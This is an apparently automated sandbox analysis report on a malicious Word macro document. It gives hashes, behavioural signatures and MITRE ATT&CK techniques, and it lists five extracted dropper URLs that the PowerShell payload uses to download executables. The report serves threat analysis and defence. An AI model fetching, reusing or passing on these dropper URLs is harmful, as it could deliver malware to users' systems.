Overview

overview

10

Static

static

8

02e541bb03...18.doc

windows7-x64

10

02e541bb03...18.doc

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    02e541bb03899c2e0dc832cf6042fe2f_JaffaCakes118

  • Size

    138KB

  • Sample

    240427-k2edesfc39

  • MD5

    02e541bb03899c2e0dc832cf6042fe2f

  • SHA1

    15dfcf6865e0ea59c73a48a0fc60f6e73de484b0

  • SHA256

    a3ede90ae5fc65fda1dd1ee6bd6e0cc8ff9f6c2f976c9de8d1fe2c670e99fbc2

  • SHA512

    92ff22c35e4b103c00e84c6a466ac2b37c1398c733b4daff510f21a7b109c1b8239d6a72d2d261dd0439d92db9cb11c8be2adbf5489a01c44a94bdb05045a009

  • SSDEEP

    1536:mW81ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadVWlPadqETqKngyl+a9:mW8GhDS0o9zTGOZD6EbzCdVcacETq

Score
10/10
macro

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://haitiexpressnews.com/axVVsl8C
exe.dropper

http://dentalimplantslondon.info/7MlH3wX
exe.dropper

http://duanguavietnam.com/flag/nRo9nop
exe.dropper

http://kowsarpipe.com/XrdcZl5H7Z
exe.dropper

http://www.acilevarkadasi.com/oNHf5D1hZB

Targets

    • Target

      02e541bb03899c2e0dc832cf6042fe2f_JaffaCakes118

    • Size

      138KB

    • MD5

      02e541bb03899c2e0dc832cf6042fe2f

    • SHA1

      15dfcf6865e0ea59c73a48a0fc60f6e73de484b0

    • SHA256

      a3ede90ae5fc65fda1dd1ee6bd6e0cc8ff9f6c2f976c9de8d1fe2c670e99fbc2

    • SHA512

      92ff22c35e4b103c00e84c6a466ac2b37c1398c733b4daff510f21a7b109c1b8239d6a72d2d261dd0439d92db9cb11c8be2adbf5489a01c44a94bdb05045a009

    • SSDEEP

      1536:mW81ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadVWlPadqETqKngyl+a9:mW8GhDS0o9zTGOZD6EbzCdVcacETq

    Score
    10/10

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    behavioral1behavioral2

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Tasks